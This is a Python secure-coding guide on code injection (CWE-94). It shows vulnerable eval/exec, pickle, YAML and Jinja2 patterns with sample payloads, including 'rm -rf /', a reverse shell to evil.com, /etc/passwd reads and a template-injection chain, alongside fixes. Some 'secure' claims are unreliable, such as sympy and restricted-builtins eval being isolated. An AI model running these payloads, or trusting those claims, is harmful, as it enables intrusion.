CWE-94: Improper Control of Generation of Code (Code Injection) - Python
Overview
Code injection in Python occurs when untrusted input is passed to code execution functions like eval(), exec(), compile(), or __import__(). This allows attackers to execute arbitrary Python code with full access to the application's runtime environment, including file system, network, environment variables, imported modules, and all application data. Python's dynamic nature and powerful introspection capabilities make code injection particularly dangerous.
Primary Defence: Never use eval() or exec() with user input; use safe alternatives like ast.literal_eval() for evaluating literals, json.loads() for JSON data, or implement strict allowlists for any dynamic code evaluation, use sandboxed execution with restricted __builtins__ if code evaluation is absolutely necessary, and validate all input against strict patterns to prevent arbitrary code execution.
Common Vulnerable Patterns
eval() with User Input
# VULNERABLE - Direct eval of user input
def calculate(expression):
result = eval(expression) # NEVER DO THIS
return result
# User input: "__import__('os').system('rm -rf /')"
# Executes arbitrary code!
Why this is vulnerable: eval() executes any Python expression. Attacker can import modules, call functions, access globals.
exec() with User Code
# VULNERABLE - Execute user-provided code
def run_user_script(code):
exec(code) # EXTREMELY DANGEROUS
return "Script executed"
# User input: "import socket; s=socket.socket(); s.connect(('evil.com',1234)); ..."
# Reverse shell established!
Why this is vulnerable: exec() can execute multiple statements, imports, class definitions - full Python capabilities.
compile() and exec() Chain
# VULNERABLE - Compile and execute user code
def execute_formula(formula):
compiled = compile(formula, '<string>', 'eval')
result = eval(compiled)
return result
# User input: "open('/etc/passwd').read()"
# Reads sensitive file
Why this is vulnerable: compile() + eval() provides same attack surface as direct eval().
Dynamic Module Import
import importlib
# VULNERABLE - Import user-specified module
def load_plugin(plugin_name):
module = __import__(plugin_name) # DANGEROUS
return module
# Alternate dangerous approach
def load_module(module_name):
module = importlib.import_module(module_name) # DANGEROUS
return module
# User input: "subprocess" or "os"
# Attacker can import any module and access dangerous functions
Why this is vulnerable: Allows importing arbitrary modules. Attacker can import os, subprocess, socket, etc.
Template Injection (Jinja2 Unsafe)
from jinja2 import Template
# VULNERABLE - User input in template without sandboxing
def render_greeting(name):
template_str = f"Hello {{{{ {name} }}}}"
template = Template(template_str)
return template.render()
# User input: "''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].system('whoami')"
# Executes system command via template injection!
Why this is vulnerable: Jinja2 templates can access Python objects. Attacker can traverse object hierarchy to reach dangerous functions.
Pickle Deserialization
import pickle
# VULNERABLE - Unpickle untrusted data
def load_user_data(data):
obj = pickle.loads(data) # CRITICAL VULNERABILITY
return obj
# Attacker sends crafted pickle payload
# Arbitrary code executes during unpickling
Why this is vulnerable: Pickle can execute arbitrary code during deserialization via __reduce__ method.
YAML Unsafe Loading
import yaml
# VULNERABLE - Load YAML with arbitrary Python object execution
def load_config(yaml_str):
config = yaml.load(yaml_str) # DEPRECATED - DANGEROUS
# or yaml.load(yaml_str, Loader=yaml.Loader) # ALSO DANGEROUS
return config
# User YAML input:
# !!python/object/apply:os.system ['whoami']
# Executes system command!
Why this is vulnerable: yaml.load() without Loader=yaml.SafeLoader can instantiate arbitrary Python objects.
Format String with User Globals Access
# VULNERABLE - Format string with untrusted format spec
def format_message(template, **kwargs):
return template.format(**kwargs)
# User input template: "{user.__init__.__globals__[os].system('whoami')}"
# Can access dangerous objects through format spec
Why this is vulnerable: Format strings can access object attributes. Combined with __globals__, can reach dangerous modules.
Secure Patterns
SECURE: ast.literal_eval() for Safe Evaluation
import ast
# SECURE - Only allows Python literals (strings, numbers, tuples, lists, dicts, booleans, None)
def safe_calculate(expression):
try:
# Only evaluates literals - no function calls, no imports
result = ast.literal_eval(expression)
return result
except (ValueError, SyntaxError):
raise ValueError("Invalid expression")
# Safe inputs: "42", "3.14", "{'key': 'value'}", "[1, 2, 3]"
# Blocked: "__import__('os').system('whoami')" - raises ValueError
Why this works: ast.literal_eval() only parses Python literal structures (strings, numbers, tuples, lists, dicts, sets, booleans, None) - it cannot evaluate function calls, variable lookups, imports, or any executable code. The function parses the input into an AST (Abstract Syntax Tree) and verifies every node is a literal; if it finds anything else (function call, attribute access, operator), it raises ValueError. This makes it safe for deserializing simple data structures from untrusted input, such as config files or user-supplied parameters. Unlike eval(), which executes arbitrary Python code and can run __import__('os').system('rm -rf /'), ast.literal_eval() is strictly data-only. Use it for parsing lists, dicts, numbers, and strings when you control the format but not the content. For more complex deserialization, use json.loads() (even safer, only basic types).
SECURE: Restricted Expression Parser
import ast
import operator
# SECURE - Allowlist allowed operators
ALLOWED_OPS = {
ast.Add: operator.add,
ast.Sub: operator.sub,
ast.Mult: operator.mul,
ast.Div: operator.truediv,
ast.Mod: operator.mod,
ast.Pow: operator.pow,
ast.USub: operator.neg,
}
ALLOWED_NODES = (ast.Expression, ast.Constant, ast.BinOp, ast.UnaryOp)
def safe_eval(expr):
"""Safely evaluate mathematical expressions only"""
tree = ast.parse(expr, mode='eval')
# Verify only allowed node types
for node in ast.walk(tree):
if not isinstance(node, ALLOWED_NODES):
raise ValueError(f"Forbidden node type: {type(node).__name__}")
if isinstance(node, ast.BinOp) and type(node.op) not in ALLOWED_OPS:
raise ValueError(f"Forbidden operator: {type(node.op).__name__}")
# Execute with restricted environment
def eval_node(node):
if isinstance(node, ast.Constant):
return node.value
elif isinstance(node, ast.BinOp):
left = eval_node(node.left)
right = eval_node(node.right)
return ALLOWED_OPS[type(node.op)](left, right)
elif isinstance(node, ast.UnaryOp):
operand = eval_node(node.operand)
return ALLOWED_OPS[type(node.op)](operand)
else:
raise ValueError(f"Unsupported node: {type(node).__name__}")
return eval_node(tree.body)
# Usage
result = safe_eval("(10 + 5) * 2") # 30
# safe_eval("__import__('os').system('whoami')") # Raises ValueError
Why this works: This AST-based expression evaluator parses user input into an Abstract Syntax Tree and validates it against an allowlist of safe node types and operators before execution. The ast.parse() call converts the expression into a structured tree without executing it. By walking the AST and checking each node is in ALLOWED_NODES (only literals, binary ops, unary ops) and each operator is in ALLOWED_OPS (only basic arithmetic), you prevent function calls, imports, attribute access, and other dangerous operations. The custom eval_node() interpreter then safely evaluates only the allowed operations. This approach is far more secure than eval() because attackers cannot call __import__(), access __builtins__, or escape the sandbox. Use this pattern for calculators, formula evaluators, or any feature where users provide mathematical expressions. The allowlist is explicit and auditable; add only operations you've reviewed.
SECURE: Configuration-Driven Logic (Not Code)
import json
# SECURE - Use JSON configuration instead of code
def apply_pricing_rule(price, rule_config):
"""Apply pricing rules from JSON config, not executable code"""
rule = json.loads(rule_config)
# Declarative configuration
if rule['type'] == 'percentage_discount':
discount = price * (rule['percent'] / 100)
return price - discount
elif rule['type'] == 'fixed_discount':
return price - rule['amount']
elif rule['type'] == 'bulk_discount':
if price > rule['threshold']:
return price * (1 - rule['discount'])
return price
else:
raise ValueError("Unknown rule type")
# Safe configuration (JSON, not code)
config = '{"type": "percentage_discount", "percent": 10}'
discounted = apply_pricing_rule(100, config) # 90.0
# No code injection possible - only data configuration
Why this works: Using JSON for configuration instead of executable code eliminates code injection entirely. JSON is a data-only format - it can only represent basic types (objects, arrays, strings, numbers, booleans, null); it cannot contain functions, class instantiations, imports, or executable statements. When you parse JSON with json.loads(), you get pure Python data structures (dicts, lists, strings, numbers), not code. The business logic (if/elif conditions, calculations) lives in your trusted Python code, while user input only supplies data values (discount percentages, thresholds, amounts). This is the safest pattern for extensibility: users configure behavior through data, not by injecting code. Even if an attacker fully controls rule_config, they can only set field values, not execute commands or access the system. Use JSON config for pricing rules, workflows, plugins, feature flags - anywhere users customize behavior. Combine with schema validation (jsonschema) to enforce data structure and prevent logic errors.
SECURE: Jinja2 with Sandboxing
from jinja2.sandbox import SandboxedEnvironment
# SECURE - Use Jinja2 sandbox
env = SandboxedEnvironment()
def render_template(template_str, context):
"""Render templates in sandboxed environment"""
template = env.from_string(template_str)
return template.render(context)
# Usage
result = render_template("Hello {{ name }}!", {'name': 'Alice'}) # "Hello Alice!"
# Sandboxed - dangerous operations blocked
# template_str = "{{ ''.__class__.__mro__[1].__subclasses__() }}"
# Raises SecurityError
Why this works: Jinja2's SandboxedEnvironment restricts template access to dangerous Python features, preventing code injection through template strings. Unlike regular Jinja2 (which allows attribute access like {{''.__class__.__mro__}}), the sandbox blocks access to private attributes (those starting with _), sensitive methods (__subclasses__, __globals__), and dangerous builtins. Attackers often exploit template engines to escape into the Python runtime via attribute traversal; the sandbox prevents this by intercepting attribute lookups and rejecting unsafe ones. The sandbox also disables dangerous template tags and filters unless explicitly allowed. Use SandboxedEnvironment for any user-editable templates (email templates, report generators, CMS content). Never use regular Environment with untrusted templates. Combine with auto-escaping (enabled by default) to prevent XSS, and register only safe custom filters/functions. For even stricter control, consider a logic-less engine (Mustache, Handlebars) with no code execution.
SECURE: Safe YAML Loading
import yaml
# SECURE - Use SafeLoader to prevent arbitrary object instantiation
def load_config(yaml_str):
config = yaml.safe_load(yaml_str) # ALWAYS use safe_load
return config
# Alternative explicit safe loader
def load_config_explicit(yaml_str):
config = yaml.load(yaml_str, Loader=yaml.SafeLoader)
return config
# Safe - only loads basic YAML types (strings, numbers, lists, dicts)
# Blocks: !!python/object/apply:os.system ['whoami']
Why this works: yaml.safe_load() only constructs simple Python objects (dict, list, str, int, float, bool, None) and blocks arbitrary object instantiation, preventing code execution via YAML deserialization. The unsafe yaml.load() (deprecated) can instantiate any Python class using YAML tags like !!python/object/apply:, allowing attackers to run os.system(), open files, or execute arbitrary code. safe_load() uses SafeLoader, which only recognizes basic YAML types and ignores dangerous tags. Always use safe_load() or explicitly pass Loader=yaml.SafeLoader when parsing untrusted YAML. This vulnerability (YAML deserialization) has caused major breaches; unsafe YAML loading is as dangerous as eval(). For configuration files you control, safe_load() is sufficient. If you need custom object loading, define explicit constructors with add_constructor() and validate fields, never use yaml.load() or UnsafeLoader.
SECURE: JSON for Serialization (Not Pickle)
import json
# SECURE - Use JSON instead of pickle
def save_user_data(data):
serialized = json.dumps(data)
return serialized
def load_user_data(serialized):
data = json.loads(serialized)
return data
# JSON only supports basic types - no code execution
# If complex objects needed, use explicit serialization methods
Why this works: JSON is a data-only format that cannot execute code during deserialization, while pickle can instantiate arbitrary Python objects and execute code via __reduce__ methods, making it dangerous for untrusted data. When you json.loads() a payload, you get only basic types (dicts, lists, strings, numbers); an attacker cannot trigger class constructors, import modules, or run commands. Pickle, by contrast, is designed to serialize entire Python object graphs, including class instances, and can call arbitrary code during unpickling. Attackers craft malicious pickle payloads that execute os.system(), open reverse shells, or exfiltrate data. Never unpickle untrusted data - use JSON for serialization. If you need complex objects, serialize them to JSON with explicit to_dict() methods and reconstruct them with constructors that validate fields. For internal, trusted use (caching, IPC between your own processes), pickle is acceptable with integrity checks (HMAC).
SECURE: Plugin System with Allowlist
import importlib
# SECURE - Allowlist allowed plugins
ALLOWED_PLUGINS = {
'plugin_auth': 'myapp.plugins.auth',
'plugin_reports': 'myapp.plugins.reports',
'plugin_export': 'myapp.plugins.export'
}
def load_plugin(plugin_name):
"""Load plugin from allowlist only"""
if plugin_name not in ALLOWED_PLUGINS:
raise ValueError(f"Plugin '{plugin_name}' not allowed")
module_path = ALLOWED_PLUGINS[plugin_name]
module = importlib.import_module(module_path)
return module
# Safe - only pre-approved plugins can be loaded
# load_plugin('os') # Raises ValueError
Why this works: Allowlisting modules for dynamic imports prevents code injection by ensuring only pre-approved, safe modules can be loaded. When users control which modules to import (plugin systems, configurable imports), an attacker could import dangerous modules (os, subprocess, importlib) or malicious third-party packages to execute arbitrary code, read files, or compromise the system. By checking plugin_name against ALLOWED_PLUGINS before calling importlib.import_module(), you ensure only trusted, reviewed plugins are accessible. The allowlist maps user-facing plugin names to specific module paths you control, preventing path traversal or namespace pollution. This pattern is critical for plugin architectures. Store the allowlist server-side (never trust client input for module names), keep it minimal and audited, and review each plugin's code. For stronger isolation, load plugins in separate processes (multiprocessing) or containers. Combine with code signing or hash verification to detect tampering.
SECURE: Mathematical Expression Evaluator (sympy)
from sympy import sympify
from sympy.parsing.sympy_parser import parse_expr, standard_transformations, implicit_multiplication_application
# SECURE - Use sympy for mathematical expressions
def safe_math_eval(expr_str):
"""Safely evaluate mathematical expressions"""
try:
transformations = (standard_transformations + (implicit_multiplication_application,))
expr = parse_expr(expr_str, transformations=transformations)
result = expr.evalf()
return float(result)
except Exception as e:
raise ValueError(f"Invalid mathematical expression: {e}")
# Safe mathematical evaluation
result = safe_math_eval("2*pi + sqrt(16)") # Works
# safe_math_eval("__import__('os')") # Raises ValueError
Why this works: sympy provides a mathematical expression parser that only evaluates math operations (arithmetic, algebra, calculus, constants like pi), not arbitrary Python code. Unlike eval(), which executes any Python and can call __import__('os').system('rm -rf /'), parse_expr() parses symbolic math expressions into a safe AST and evaluates them numerically. Attempts to call functions outside sympy's math namespace (imports, attribute access, builtins) raise exceptions. The parser is isolated from the Python runtime, so attackers cannot escape to execute code or access the file system. Use sympy for calculators, graphing tools, scientific computing features, or any math input. The library handles complex expressions, variables, and functions (sin, cos, sqrt, integrals) safely. For simple arithmetic, the AST-based evaluator shown earlier is lighter; use sympy when you need symbolic math capabilities. Always wrap in try/except and set evaluation limits (timeout, recursion depth) to prevent DoS.
Key Security Functions
AST-based Expression Validator
import ast
def validate_safe_expression(expr_str):
"""Validate expression only contains safe operations"""
try:
tree = ast.parse(expr_str, mode='eval')
except SyntaxError:
raise ValueError("Invalid Python syntax")
# Define allowed node types
SAFE_NODES = (
ast.Expression, ast.Constant, ast.Num, ast.Str, # ast.Num, ast.Str for Python < 3.8
ast.BinOp, ast.UnaryOp, ast.Compare,
ast.List, ast.Tuple, ast.Dict,
ast.Add, ast.Sub, ast.Mult, ast.Div, ast.Mod, ast.Pow,
ast.Eq, ast.NotEq, ast.Lt, ast.LtE, ast.Gt, ast.GtE,
ast.USub, ast.UAdd
)
for node in ast.walk(tree):
if not isinstance(node, SAFE_NODES):
raise ValueError(f"Forbidden operation: {type(node).__name__}")
return True
# Usage
validate_safe_expression("(10 + 5) * 2") # OK
# validate_safe_expression("__import__('os')") # Raises ValueError
Sandboxed Execution Environment
def sandboxed_eval(expr, allowed_builtins=None):
"""Execute expression in restricted environment"""
if allowed_builtins is None:
allowed_builtins = {
'abs': abs, 'min': min, 'max': max, 'len': len,
'sum': sum, 'round': round, 'sorted': sorted
}
# Empty global and local namespaces
safe_globals = {
'__builtins__': allowed_builtins
}
safe_locals = {}
try:
result = eval(expr, safe_globals, safe_locals)
return result
except Exception as e:
raise ValueError(f"Evaluation error: {e}")
# Usage
result = sandboxed_eval("abs(-5) + max([1,2,3])") # 8
# sandboxed_eval("open('/etc/passwd').read()") # NameError: name 'open' is not defined
Plugin Signature Verification
import hashlib
import hmac
PLUGIN_SECRET = b'your-secret-key-here' # From environment variable
def verify_plugin_signature(plugin_code, signature):
"""Verify plugin hasn't been tampered with"""
expected_sig = hmac.new(PLUGIN_SECRET, plugin_code.encode(), hashlib.sha256).hexdigest()
return hmac.compare_digest(expected_sig, signature)
def load_verified_plugin(plugin_code, signature):
"""Only load plugins with valid signature"""
if not verify_plugin_signature(plugin_code, signature):
raise ValueError("Invalid plugin signature")
# Even with verification, execute in restricted environment
safe_globals = {'__builtins__': {}}
exec(plugin_code, safe_globals)
return safe_globals
Verification
After implementing the recommended secure patterns, verify the fix through multiple approaches:
- Manual testing: Submit malicious payloads relevant to this vulnerability and confirm they're handled safely without executing unintended operations
- Code review: Confirm all instances use the secure pattern (parameterized queries, safe APIs, proper encoding) with no string concatenation or unsafe operations
- Static analysis: Use security scanners to verify no new vulnerabilities exist and the original finding is resolved
- Regression testing: Ensure legitimate user inputs and application workflows continue to function correctly
- Edge case validation: Test with special characters, boundary conditions, and unusual inputs to verify proper handling
- Framework verification: If using a framework or library, confirm the recommended APIs are used correctly according to documentation
- Authentication/session testing: Verify security controls remain effective and cannot be bypassed (if applicable to the vulnerability type)
- Rescan: Run the security scanner again to confirm the finding is resolved and no new issues were introduced
Analysis Steps
- Locate the eval/exec Call:
- Trace Input Source:
- Web form?
request.form['expression'] - API endpoint?
request.json['code'] - File upload? Reading file contents
- Database? User-stored formulas
- Assess Execution Context:
- What can injected code access? (All Python modules, file system, network)
- What privileges does application run with? (Web server user, database access)
- What data is accessible? (User data, secrets in environment variables)
- Determine Safe Alternative:
- Mathematical expressions → Use
ast.literal_eval()orsympy - Configuration → Use JSON/YAML with
safe_load() - Business rules → Use rule engine or declarative config
- Plugin system → Use allowlist + signature verification
Remediation for Scanner Finding
Step 1: Identify the purpose
# BEFORE (Line 42 - vulnerable)
def calculate(user_expression):
result = eval(user_expression) # User wants to calculate "2 + 2"
return result
Step 2: Replace with safe alternative
# AFTER (fixed with ast.literal_eval for simple cases)
import ast
def calculate(user_expression):
try:
# Only allows Python literals and basic operations
result = ast.literal_eval(user_expression)
return result
except (ValueError, SyntaxError):
raise ValueError("Invalid expression")
# Or for more complex math:
from sympy import sympify
def calculate_math(user_expression):
try:
expr = sympify(user_expression)
result = expr.evalf()
return float(result)
except Exception:
raise ValueError("Invalid mathematical expression")
Step 3: Add input validation
import re
def validate_math_expression(expr):
"""Additional validation layer"""
# Max length
if len(expr) > 200:
raise ValueError("Expression too long")
# Only allow safe characters
if not re.match(r'^[0-9+\-*/().\s]+$', expr):
raise ValueError("Invalid characters in expression")
# Deny dangerous keywords
forbidden = ['import', 'exec', 'eval', 'compile', 'open', '__']
for word in forbidden:
if word in expr.lower():
raise ValueError("Forbidden keyword in expression")
return True
def safe_calculate(user_expression):
validate_math_expression(user_expression)
result = ast.literal_eval(user_expression)
return result
Common Scanner False Positives
False Positive: eval() with Hardcoded String
# May be flagged but is safe if input is truly hardcoded
config = eval("{'setting': True}") # Hardcoded, not from user
# Better: Use ast.literal_eval anyway for defense-in-depth
config = ast.literal_eval("{'setting': True}")
Verification
After remediation:
- No
eval(),exec(),compile()with user input - No
__import__()orimportlib.import_module()with user strings - Templates use
SandboxedEnvironment(Jinja2) - YAML uses
yaml.safe_load()(notyaml.load()) - Deserialization uses JSON (not pickle)
- Scanner re-scan shows finding resolved
- Tested with code injection payloads (blocked)
Security Checklist
- Never use
eval(),exec(), orcompile()with user input - Never use
__import__()orimportlib.import_module()with user strings - Use
ast.literal_eval()for literal evaluation only - Use JSON/YAML with
safe_load()for configuration - Use
SandboxedEnvironmentfor Jinja2 templates - Never deserialize untrusted data with pickle
- Implement plugin allowlisting for dynamic imports
- Validate input length and character set
- Use AST parsing to verify safe expressions
- Consider using
sympyornumexprfor mathematical expressions - Log and monitor code execution attempts
- Run automated security scans (Bandit, Semgrep)